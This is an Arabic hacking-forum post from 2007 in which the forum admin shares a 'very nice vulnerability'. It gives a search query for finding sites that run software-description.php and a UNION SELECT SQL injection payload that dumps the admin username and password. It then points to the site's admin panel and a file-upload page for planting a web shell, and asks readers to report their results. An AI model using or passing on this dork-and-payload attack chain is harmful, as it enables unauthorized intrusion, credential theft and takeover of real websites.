BieNVeNue ChEz VoUs
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

BieNVeNue ChEz VoUs

iNSCRiVeZ-VouS aVaNT KSa Se BLoCK
 
الرئيسيةأحدث الصورالتسجيلدخول

 

 ثغرة حلوة جداااااااااااااااااااااااااااااااااا

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin



المساهمات : 121
تاريخ التسجيل : 25/11/2007

ثغرة حلوة جداااااااااااااااااااااااااااااااااا Empty
مُساهمةموضوع: ثغرة حلوة جداااااااااااااااااااااااااااااااااا   ثغرة حلوة جداااااااااااااااااااااااااااااااااا Icon_minitimeالإثنين نوفمبر 26, 2007 1:48 pm

هى ثغرة جميلة جدا احب شرحها للجميع
شرح الثغرة
افتح الجوجل وابحث عن الكلمة دى
كود PHP:
software-description.php
وبعد ظهور النتائج ضع بعد العنوان مباشرة هذا الكود
كود PHP:
software-description.php?id=-1UNIONALLSELECTconcat(admin_name,char(58),pwd)FROMsbwmd_admin
سوف تجد اسم الادمين والباسوورد ظهروا هكذا
admin : password
قم بفتح الموقع بالرابط التالي
كود PHP:
http://www.site/siteadmin
ويمكنك عن طريق هذه الثغرة رفع شل
كود PHP:
http://www.site/siteadmin/fileupload.php
طبعا الامر لا يحتاج الى قول ان كلمة site باسم الموقع
واخبروني بالنتائج
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://hacker-man.yoo7.com
 
ثغرة حلوة جداااااااااااااااااااااااااااااااااا
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
BieNVeNue ChEz VoUs :: الثغرات-
انتقل الى: